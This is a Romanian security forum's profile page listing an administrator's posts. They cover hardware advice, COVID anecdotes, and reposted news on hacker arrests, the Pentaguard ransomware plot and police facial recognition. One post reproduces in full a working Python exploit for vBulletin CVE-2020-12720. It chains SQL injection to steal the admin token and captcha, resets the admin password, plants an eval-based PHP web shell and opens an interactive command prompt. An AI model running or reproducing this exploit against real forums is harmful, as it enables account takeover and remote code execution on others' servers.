Jump to content

Nytro

Administrators
  • Posts

    18750
  • Joined

  • Last visited

  • Days Won

    722

Everything posted by Nytro

  1. Nytro

    Fun stuff

  2. Of
  3. Probabil contactul HDMI/VGA nu se face cum trebuie. Dar ma gandesc ca ar fi trebuit sa apara un "mesaj" pe monitor legat de faptul ca nu e semnal ceva. Ai incercat sa ii dai doua palme? La TV-urile vechi mergea, poate merge si aici, nu ai nimic de pierdut.
  4. O intamplare reala, din neamul meu. Rude. Va garantez ca e adevarat. Recent, a murit cineva, o ruda. Era mai in varsta si avea ceva probleme de sanatate dar nu avea interactiune decat ocazionala cu o singura persoana. Dupa ce a murit, a venit cineva (nu stiu exact de unde, dar pot afla) si au oferit rudelor 500 EUR ca sa semneze ca a murit de Covid-19. Doar ca rudele nu au vrut. I-au facut analizele si dupa cum era de asteptat, testul a iesit negativ. Ideea e ca am vazut la stiri un interviu luat pe strada in care cineva mentiona ceva asemanator. Nu am crezut, dar despre aceasta intamplare stiu cu certitudine. Acum, ma intreb, oare de ce? Eu cred ca exista niste fonduri pentru asa ceva si ca exista si persoane care vor sa ramana cu bani de pe urma lor. Are cineva idee care ar putea fi cauza? "Sa dea la numar" nu e un argument. Cineva trebuie sa aiba beneficii in urma unor astfel de actiuni iar intr-un final totul se traduce in bani.
  5. Se pare ca alcoolol pe care il consumai are aceleasi efecte ca masca (descrise mai sus). Forta! Asta inseamna ca nu trebuie sa o port! PS: Pentru cei care nu se prin, noi glumim aici. Lucrand inconjurati de tehnologie si de unde 5G suntem deja mai prajiti ca cartofii. Nu ne luati in seama.
  6. Da, dar e inutil atat timp cat exista NetRipper!
  7. Spune aici despre ce proiect este vorba, poate are cineva ceva facut si iti poate trimite.
  8. Huawei a incercat sa compromita nucleu Linux cu un patch 15.05.2020 04:30 | GABRIEL5SOFTWARE Dupa scandaluri care par sa nu se mai termine, Huawei pare sa nu inteleaga ce se intampla. Duminica au incercat sa compromita nucleul Linux printr-un patch. Au fost opriti la limita. Patch-ul in sine trebuia doar sa implementeze functia Huawei Kernel Self Protection specifica dispozitivelor Huawei in nucleul Linux. Doar ca dupa cateva verificari s-a constatat ca acest patch era rau intentionat. Acesta avea o vulnerabilitate care putea fi exploatata cu usurinta, spun sursele. Mai mult, vulnerabilitatea parea a fi facuta de un amator. Huawei a recunoscut problema si ca de obicei vinovatul este un angajat. Culmea, un inginer de top specializat in securitate cibernetica. Fix el sa faca o astfel de eroare? Greu de crezut. Pentru noi nu este ceva nou, caci am vazut numeroase stiri si cazuri in care Huawei a incercat sa fure date personale folosind astfel de vulnerabilitati, iar cand au fost prinsi au dat vina pe angajati. Sunt curios, acum tot Samsung si Apple sunt de vina pentru ce li se intampla? Sursa: https://arenait.ro/huawei-incercat-compromita-nucleu-linux-patch/
  9. Cateva lucruri de mentionat: 1. "cu vârste cuprinse între 15 și 24 de ani" - Sunt multi tineri dobitoci care risca probleme facand mizerii pe net. Terminati cu porcariile. Exista metode eficiente de a face bani frumosi in security, legal... 2. "PSD (pe care au postat mesajul străzii "Fără penali în funcţiile publice")" - Forta! 3. "s-au lăudat cu "loviturile" în grupuri private create pe o reţea de socializare" - Asta e problema principala. Te caci in strada apoi il iei la palme. Stati in sloboz in bancile voastre, laudele astea nu va aduc nimic bun 4. "scos la vânzare anumite date ale utilizatorilor şi parolele acestora" - Faptul ca nu permitem astfel de lucruri pe forum ne scapa si pe noi de probleme, dar mai ales pe astfel de persoane care fac 50-100 EUR astfel. Se castiga mai bine la dat cu sapa, ba 5. "date de identificare ale cardurilor bancare" - Daca vreti sa faceti bani asa, faceti-o cu cap. Dar din cate stiu eu un "CC" se vinde cu 2-3-4 USD, deci daca nu dati o lovitura mare, degeaba 6. "atacuri informatice de tip Ddos" - Ce pula mea ba, mai suntem in 2000? Terminati cu cacaturile astea
  10. Lovitură a anchetatorilor din Oradea: Hackeri din 11 judeţe prinşi că spărgeau conturi de Netflix, Facebook şi site-urile unor instituţii publice foto:generic istock 1 imagine Laura Gal Acţiune de amploare a poliţiştilor Brigăzii de Combatere a Criminalității Organizate Oradea care, împreună cu procurorii DIICOT Oradea, au descins, joi, în percheziţii în 11 judeţe din ţară, într-o anchetă ce vizează un grup 18 de tineri bănuiţi de infracţiuni informatice. Potrivit unui comunicat de presă transmis, vineri, de Poliţie, poliţiştii şi procurorii din Bihor au desfăşurat, cu sprijinul colegilor locali, 18 percheziţii domiciliare în judeţele Timiș, Argeș, Mureș, Galați, Iași, Suceava, Arad, Gorj, Ialomița, Neamț și Botoșani "pentru destructurarea unei grupări infracționale specializate în comiterea unor infracțiuni contra siguranței și integrității sistemelor și datelor informatice și a fraudelor cu mijloace de plată electronică". Concret, spun sursele BIHOREANULUI, cei 18 tineri, cu vârste cuprinse între 15 și 24 de ani, sunt acuzaţi că au spart mai multe conturi de utilizator de pe Netflix, Facebook, mailuri şi site-uri ale unor instituţii publice, inclusiv cele ale Inspectoratului Școlar Bihor, DIICOT sau PSD (pe care au postat mesajul străzii "Fără penali în funcţiile publice"), iar apoi s-au lăudat cu "loviturile" în grupuri private create pe o reţea de socializare, unde au şi scos la vânzare anumite date ale utilizatorilor şi parolele acestora. "Cei în cauză sunt bănuiți că ar fi postat în mediul online date informatice obținute în urma atacurilor informatice desfășurate sau a transferului neautorizat de date, respectiv sisteme informatice cu drepturi de administrator, conturi de utilizatori și parole aferente diverselor aplicații informatice, conturi de poștă electronică, date de identificare a cardurilor bancare, înregistrări video ale unor presupuse atacuri informatice asupra mai multor sisteme informatice, reţele de sisteme informatice infectate precum şi date de identificare ale cardurilor bancare, toate în scopul comercializării acestora", se precizează în informarea poliţiştilor. Într-un comunicat transmis de Biroul de presă al DIICOT, procurorii arată că tinerii au acţionat în perioada 26 decembrie 2016 -10 aprilie 2020 și îşi etalau reuşitele pe Facebook. "O parte dintre membrii comunităţii au postat pe o aplicație de socializare înregistrări video reprezentând atacuri informatice de tip Ddos asupra mai multor sisteme informatice". În cadrul perchezițiilor domiciliare au fost descoperite mai multe hard-disk-uri, unități centrale, laptopuri, telefoane mobile, tablete, stickuri de memorie și diverse înscrisuri, toate fiind ridicate în vederea cercetărilor. La finalizarea perchezițiilor, trei dintre membrii grupării au fost conduşi la Bucureşti, fiind cercetaţi şi într-un alt dosar, aflat în ancheta DIICOT Central. La Oradea, ancheta se desfăşoară deocamdată doar faţă de faptă, pentru infracţiuni de acces ilegal la un sistem informatic, interceptarea ilegală a unei transmisii de date informatice, alterarea integrității datelor informatice, perturbarea funcționării sistemelor informatice, transferul neautorizat de date informatice, operațiuni ilegale cu dispozitive sau programe informatice și efectuarea de operațiuni financiare în mod fraudulos. Sursa: https://www.ebihoreanul.ro/stiri/loitura-a-anchetatorilor-din-oradea-hackeri-din-11-judete-prinsi-ca-spargeau-conturi-de-netflix-facebook-si-site-urile-unor-institutii-publice-156436.html
  11. Da, nu pare chiar ceva ce ar face un script kiddie. Interesant.
  12. Cat au evoluat malwarii astia. Anti-debug check: Portuguese language!
  13. Salut, mai degraba cauta unele facute pe Google, ai sanse mari sa gasesti ceva asemanator. Desi nu e o idee rea sa inveti Java, sunt sigur ca e mai util decat celelalte mizerii care se "invata" la ASE.
  14. Nu am citit articolul, dar din imagine ma gandesc la faptul ca e stupid de inutil complicat...
  15. Generati HTML apoi folositi un framework de conversie la PDF. Dar aveti grija la problemele de securitate care pot sa apara
  16. Oh, nu vazusem postarile de pe Facebook, penibili
  17. Nop, am trecut peste Eu pana acum nu am avut niciodata probleme cu laptop-urile si am avut HP, Dell, Asus, Lenovo, MacBook Pro. Acum vazui, 13" ? Nu e mic?
  18. Ma gandesc la doua optiuni: 1. E cum zic astia si acei Gigei-kiddies voiau sa puna ransomware sau mai stiu eu ce 2. Astia voiau sa gaseasca vulnerabilitati si apoi sa le raporteze, incercand sa faca o fapta buna. Eu as merge pe varianta 2. Stie toata lumea ca spitalele si institutiile sau mai stiu eu ce sloboz fac foamea si nu ar da bani pe ransomware Stie cineva ceva legat de asta? Parca se postase ceva referitor la ei aici pe forum acum ceva timp. Edit: vad discutii despre ei pe forum de prin 2008. Se pare ca au fost unii, ma gandesc ca Gigeii astia doar au copiat numele.
  19. Operațiune comună România – Moldova împotriva grupării de hackeri Pentaguard care voia să atace spitale românești. Liderul grupării e din Moldova ANCHETE • 15 MAI 2020 • REDACȚIA • 5.331 VIZUALIZĂRI • 4 COMENTARII Procurori români din DIICOT și procurori din Republica Moldova au făcut vineri percheziții la cei patru membri ai unei grupări de criminalitate cibernetică auto-intitulată ”Pentaguard”, potrivit unui comunicat al parchetului. Hackerii români și moldoveni ar fi intenționat să atace infrastructura informatică a mai multor instituții, printre care și spitale românești. Liderul grupării e din Republica Moldova, iar hackerii au reușit deja să atace site-urile unor primării de comune, al DSP Constanța și DSP Tulcea, potrivit unor surse judiciare. Ei intenționau să atace site-urile unor spitale, să trimită email-uri cu viruși ce păreau să vină de la alte autorități din domeniu. Virusul urma să blocheze sistemele informatice, iar pentru deblocare ar fi cerut răscumpărare. Comunicatul integral al DIICOT: La data de 15.05.2020, procurorii D.I.I.C.O.T. – Structura Centrală împreună cu ofițeri de poliție judiciară din cadrul Direcției de Combatere a Criminalității Organizate au efectuat un număr de 3 percheziții domiciliare, într-o cauză vizând destructurarea unui grup infracțional organizat specializat în săvârșirea infracțiunilor de operațiuni ilegale cu dispozitive și programe informatice, acces ilegal la un sistem informatic, alterarea integrității datelor informatice și fals informatic. Concomitent cu perchezițiile din România a fost efectuată și o percheziție pe teritoriul Republicii Moldova, în baza unei comisii rogatorii transmise de către procurorii DIICOT autorităților judiciare din acest stat. În cauză există suspiciunea rezonabilă că, la începutul anului 2020, a fost constituit o grupare infracţională organizată, formată din 4 persoane, grupare ce a activat în mediul virtual, sub titulatura de „Pentaguard”, având drept scop săvârşirea de infracţiuni specifice criminalităţii cibernetice. Obiectivul grupării urma să ţintească două paliere execuţionale, respectiv: • deţinerea de aplicaţii informatice destinate a fi folosite în atacuri informatice specifice de tip SQl Injection şi Defacement, având ca finalitate, accesarea neautorizată, urmată de compromiterea conţinutului şi după caz, sustragerea datelor informatice stocate, acţiuni ce au avut drept ţintă domenii web ce găzduiau site-urile mai multor instituţii publice (instituţii ale administraţiei publice centrale şi locale, guvernamentale) şi private (instituţii financiar- bancare, culturale, educaţie, etc), din România şi Republica Moldova. • deţinerea şi dezvoltarea de aplicaţii informatice maliţioase – malware, în scopul utilizării lor în atacuri informatice de tip rasomware – cryptolocker (criptarea datelor informatice şi blocarea implicită a funcţionării legitime a acestora) şi R.A.T. (Remote Acces Troian – controlul de la distanţă a computerului ţintă). Astfel de atacuri maliţioase, în scopul blocării, restricţionării accesului şi perturbării sistemelor informatice, precum şi accesării şi alterării frauduloase a conţinutului domeniilor web, au fost şi după caz, urmau a fi îndrepate inclusiv împotriva mai multor instituţii publice atât din Bucureşti cât şi din alte oraşe din ţară. La diferite intervale de timp şi în baza aceleiași rezoluții infracționale, cu intenția de a accesa ilegal şi a compromite prin introducerea neautorizată de date informatice şi modificarea fără drept a conţinutului platformelor ţintă, prin aceeaşi modalitate de operare, inculpații au exercitat mai multe atacuri informatice de tip „Sql Injection” şi „Defacement” asupra altor site-uri web aparținând unor persoane juridice publice şi private din România, fiind afectate atât disponibilitatea cât şi integritatea conținutului datelor stocate în cadrul respectivelor infrastructuri informatice. Mai mult, din informațiile obținute până în prezent a reieșit faptul că aceștia intenționau să lanseze inclusiv atacuri informatice de tip „ransomware”, în perioada imediat următoare, asupra unor instituții de sănătate publică din România, în general spitale, folosind o inginerie socială prin trimiterea unei aplicații malițioase executabile, din familiile „Locky” sau „BadRabbit” (virus informatic), mascate într-un e-mail şi sub forma unui fișier ce aparent ar veni din partea altor instituții guvernamentale, referitor la amenințarea COVID19. Prin această tehnică, autorul atacului poate determina în mod facil ţinta să deschidă respectivul mail, aplicația malițioasă urmând a se descărca automat în sistemul informatic, producându-se criptarea datelor şi implicit punerea în stare de neîntrebuințare a platformei informatice. Prin acest tip de atac, exista astfel posibilitatea blocării şi perturbării grave a funcționării infrastructurilor informatice ale spitalelor respective, parte a sistemului sanitar, ce joacă un rol determinant şi decisiv în acest moment, pentru combaterea pandemiei cu noul Coronavirus. Suportul tehnic şi informativ a fost asigurat de către Serviciul Român de Informaţii. Facem precizarea că pe întreg parcursul procesului penal inculpații beneficiază de drepturile și garanțiile procesuale prevăzute de Codul de Procedură Penală, precum și de prezumția de nevinovăție. Sursa: https://www.g4media.ro/operatiune-comuna-romania-moldova-impotriva-gruparii-de-hackeri-pentaguard-care-voia-sa-atace-spitale-romanesti.html?
  20. Exploit-DB: https://www.exploit-db.com/exploits/48472
  21. Hmm, nu e rau ca specificatii, dar de ce Huawei si nu ASUS, HP, Dell? Eu as merge pe un Dell. Nu ma intreba de ce, nu stiu, doar ca mi se pare ca Dell == mai de calitate.
  22. #!/usr/bin/env python3 # rekter0, zenofex import requests import sys from random import randint if (len(sys.argv)<2 ): print('[*] usage: ./'+sys.argv[0]+' http://host/forum') exit() url = sys.argv[1] #CHECK s = requests.Session() r = s.post(url+'/ajax/api/content_infraction/getIndexableContent', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,"vbulletinrcepoc",8,7,6,5,4,3,2,1;-- -'}) if not 'vbulletinrcepoc' in r.text: print('[-] not vulnerable') exit() print('[+] Host is up and vulnerable') # GET TABLES PREFIXES r = s.post(url+'/ajax/api/content_infraction/getIndexableContent', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,table_name,8,7,6,5,4,3,2,1 from information_schema.columns WHERE column_name=\'phrasegroup_cppermission\';-- -'}) table_prefix=r.json()['rawtext'].split('language')[0] print('[+] Table prefix '+table_prefix) # GET ADMIN DETAILS # assuming admin groupid=6, default install groups unchanged r = s.post(url+'/ajax/api/content_infraction/getIndexableContent', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,concat(username,0x7c,userid,0x7c,email,0x7c,token),8,7,6,5,4,3,2,1 from '+table_prefix+'user where usergroupid=6;-- -'}) admin_user,admin_id,admin_email,admin_orig_token = r.json()['rawtext'].split('|') print('[+] admin original token '+admin_orig_token) # REQUEST CAPTCHA r = s.post(url+'/ajax/api/hv/generateToken?',headers={'X-Requested-With': 'XMLHttpRequest'},data={'securitytoken':'guest'}) rhash=r.json()['hash'] r = s.get(url+'/hv/image?hash='+rhash) # GET CAPTCHA r = s.post(url+'/ajax/api/content_infraction/getIndexableContent', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,count(answer),8,7,6,5,4,3,2,1 from '+table_prefix+'humanverify limit 0,1-- -'}) #print r.text r = s.post(url+'/ajax/api/content_infraction/getIndexableContent', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,(answer),8,7,6,5,4,3,2,1 from '+table_prefix+'humanverify limit '+str(int(r.json()['rawtext'])-1)+',1-- -'}) # REQUEST NEW PW CAPTCHA=r.json()['rawtext'] print('[+] Captcha '+CAPTCHA) r = s.post(url+'/auth/lostpw', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'email':admin_email,'humanverify[input]':CAPTCHA,'humanverify[hash]':rhash,'securitytoken':'guest'}) if not r.json()['response']==None: print('[-] reset pw failed') exit() print('[+] Resetting password') # RETRIEVE RESET TOKEN FROM DB # GET CAPTCHA r = s.post(url+'/ajax/api/content_infraction/getIndexableContent', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,activationid,8,7,6,5,4,3,2,1 from '+table_prefix+'useractivation WHERE userid='+admin_id+' limit 0,1-- -'}) TOKEN=r.json()['rawtext'] # RESET PW r = s.post(url+'/auth/reset-password', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'userid':admin_id,'activationid':TOKEN,'new-password':'P4$$w0rd!','new-password-confirm':'P4$$w0rd!','securitytoken':'guest'}) if not 'Logging in' in r.text: print('[-] fail') exit() print('[!] new admin credentials {'+admin_user+':P4$$w0rd!}') # LOGIN r = s.post(url+'/auth/ajax-login', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'username':admin_user,'password':'P4$$w0rd!','securitytoken':'guest'}) TOKEN = r.json()['newtoken'] print('[+] Writing shell') #ACTIVATE SITE-BUILDER r = s.post(url+'/ajax/activate-sitebuilder', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'pageid':'1','nodeid':'0','userid':'1','loadMenu':'false','isAjaxTemplateRender':'true','isAjaxTemplateRenderWithData':'true','securitytoken':TOKEN}) r = s.post(url+'/auth/ajax-login', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'logintype':'cplogin','userid':admin_id,'password':'P4$$w0rd!','securitytoken':TOKEN}) # SAVE WIDGET r = s.post(url+'/ajax/api/widget/saveNewWidgetInstance', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'containerinstanceid':'0','widgetid':'23','pagetemplateid':'','securitytoken':TOKEN}) widgetinstanceid = r.json()['widgetinstanceid'] pagetemplateid = r.json()['pagetemplateid'] r = s.post(url+'/ajax/api/widget/saveAdminConfig', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'widgetid':'23','pagetemplateid':pagetemplateid,'widgetinstanceid':widgetinstanceid,'data[widget_type]':'','data[title]':'Unconfigured+PHP+Module','data[show_at_breakpoints][desktop]':'1','data[show_at_breakpoints][small]':'1','data[show_at_breakpoints][xsmall]':'1','data[hide_title]':'0','data[module_viewpermissions][key]':'show_all','data[code]':'eval($_GET["e"]);','securitytoken':TOKEN}) #SAVE PAGE myshell = 'myshell'+str(randint(10, 100)) r = s.post(url+'/admin/savepage', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} , data={'input[ishomeroute]':'0','input[pageid]':'0','input[nodeid]':'0','input[userid]':admin_id,'input[screenlayoutid]':'2','input[templatetitle]':myshell,'input[displaysections[0]]':'[]','input[displaysections[1]]':'[]','input[displaysections[2]]':'[{"widgetId":"23","widgetInstanceId":"'+str(widgetinstanceid)+'"}]','input[displaysections[3]]':'[]','input[pagetitle]':myshell,'input[resturl]':myshell,'input[metadescription]':'vBulletin Forums','input[pagetemplateid]':pagetemplateid,'url':url,'securitytoken':TOKEN}) r = s.get(url+'/'+myshell+'?e=echo \'pwwwwwwwwwwwwwwwwwwned!\';', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} ) if 'pwwwwwwwwwwwwwwwwwwned' in r.text: print('[!] GOT SHELL') while True: cmd = input('> ') r = s.get(url+'/'+myshell+'?e=system(\''+cmd+'\');', verify=False,headers={'X-Requested-With': 'XMLHttpRequest'} ) print(r.text.split('<div class="widget-content">')[1].split('</div>')[0].strip().rstrip()) Sursa: https://github.com/rekter0/exploits/blob/master/CVE-2020-12720/exploit.py Bine ca am scapat de mizeria aia de vBulletin.
  23. Stiu ca unele firme se fac prin Panama (am vazut in contextul in care asteptau bani de la guvernul american si nici nu plateau taxe acolo, deci nu doar la noi se intampla) si prin Romania se practica firmele facute in Cipru. Nu am idee de ce, dar probabil au un motiv bun.
  24. Bine ai venit! Daca nici de la mine sa nu invat, pai atunci de la cine?
  25. Poliția Română va avea sistem IT de recunoaștere facială: Contractul a fost atribuit unei firme pentru 4,7 milioane de lei de Adrian Vasilache HotNews.ro Marţi, 12 mai 2020, 7:50 Sistem de recunoastere faciala Foto: Politia Romana Inspectoratul General al Poliției Române a stabilit în această lună firma câștigătoare a licitației pentru dezvoltarea unui sistem IT de recunoaștere facială, contract estimat inițial la o valoare de 4.779.008 lei (fără TVA). Poliția a atribuit acest contract, în data de 8 mai, către firma Dataware Consulting, pentru suma finală de 4.779.000 lei (fără TVA), arată datele din Sistemul electronic de achiziții publice. Poliția a dat anterior asigurări că sistemul IT nu va monitoriza în timp real spațiile publice și private și nu va capta înregistrări video, ci va fi utilizat pentru identificarea persoanelor exclusiv în cadrul investigării punctuale a unor fapte penale. Contractul atribuit către firma Dataware Consulting presupune achiziționarea unei soluții informatice pentru recunoaștere facială + training, în cadrul proiectului „Dezvoltarea sistemului de identificare și recunoaștere facială (NBIS) și interconectarea acestuia cu autoritățile de aplicare a legii din UE prin intermediul sTESTA”, astfel: 1.Soluția informatică pentru recunoaștere facială va fi formată din următoarele componente: a) Software pentru identificare și recunoaștere facială cu minim 2.000.000 de entități, b) Licențiere a sistemelor de operare de tip server, c) Soluție de baze de date și soluție de replicare baze de date, d) Soluție de virtualizare, e) Un cluster servere pentru operații mission critical, f) Servere blade, g) Soluție de stocare. 2. Training pentru recunoaștere facială (250 persoane); 3. Training pentru soluția de virtualizare (10 persoane); 4. Training pentru sistemele de operare ofertate (10 persoane). Pentru acest contract, în valoare estimată inițial la de 4.779.008 lei (fără TVA), Poliția a primit 5 oferte de la următoarele firme: 1. Dataware Consulting SRL 2. Tech Source Consulting (lider), Cymbiot Solutions (subcontractant - 6%) și Avatar Software (subcontractant - 14%). 3. Starc4sys SRL 4. RECO 3.26 5. Idemia Identity&Security France Tehnologia de recunoaștere facială, în curs de maturizare, ridică temeri în UE cu privire la modul abuziv în care ar putea fi folosită și Comisia Europeană intenționează să impună limite stricte în modul în care această tehnologie este utilizată, astfel încât cetățenii europeni să aibă drepturi bine definite cu privire la modul în care datele lor personale sunt utilizate. Poliția Română: Sistemul nu va monitoriza în timp real spațiile publice și private și nu va capta înregistrări video De altfel, în cadrul procedurii de licitație, lansate în august 2019, Poliția a primit foarte multe întrebări legate tocmai de modul cum va folosi acest sistem și de garanțiile pe care le va oferi pentru respectarea legii și a drepturilor la viață privată. Citește aici integral ce întrebări a primit Poliția legate de respectarea vieții private și ce răspunsuri a dat. La solicitarea HotNews.ro, Poliția Română a răspuns în luna septembrie 2019 mai multor întrebări legate de acest sistem IT. Printre altele, Răzvan Rădoi, comisar în cadrul Poliției Române, a precizat că sistemul IT de recunoaștere facială, pe care Poliția Română vrea să-l operaționalizeze în următoarea perioadă, "nu va realiza o monitorizare în timp real (live) a spațiilor private și/sau publice și nu va capta/stoca înregistrări video întrucât nu are capabilități tehnice în acest sens, ci va fi utilizat pentru identificarea persoanelor exclusiv în cadrul investigării punctuale a unei fapte penale." "În configurația solicitată în documentația de achiziție, software-ul pentru recunoaștere facială utilizează pentru comparare/căutare exclusiv imagini (fotografii) digitale faciale ale persoanelor ce fac obiectul identificării de către organele judiciare în cadrul atribuțiilor proprii de investigare a faptelor penale. Imaginile faciale ce vor fi utilizate pot fi însă cadre extrase din înregistrări video care ilustrează aspecte ce prezintă interes pentru investigarea faptelor penale și care sunt obținute de către organele judiciare conform atribuțiilor proprii. În consecință, sistemul nu va realiza o monitorizare în timp real (live) a spațiilor private și/sau publice și nu va capta/stoca înregistrări video întrucât nu are capabilități tehnice în acest sens ci va fi utilizat pentru identificarea persoanelor exclusiv în cadrul investigării punctuale a unei fapte penale.", a declarat pentru HotNews.ro Răzvan Rădoi, comisar în cadrul Poliției Române. Pentru detalii citește: Poliția Română, despre viitorul sistem IT de recunoaștere facială: Nu va monitoriza în timp real spațiile publice și private și nu va capta înregistrări video Sursa: https://economie.hotnews.ro/stiri-telecom-23990749-politia-romana-avea-sistem-recunoastere-faciala-contractul-fost-atribuit-unei-firme-pentru-4-7-milioane-lei.htm
      • 2
      • Upvote
×
×
  • Create New...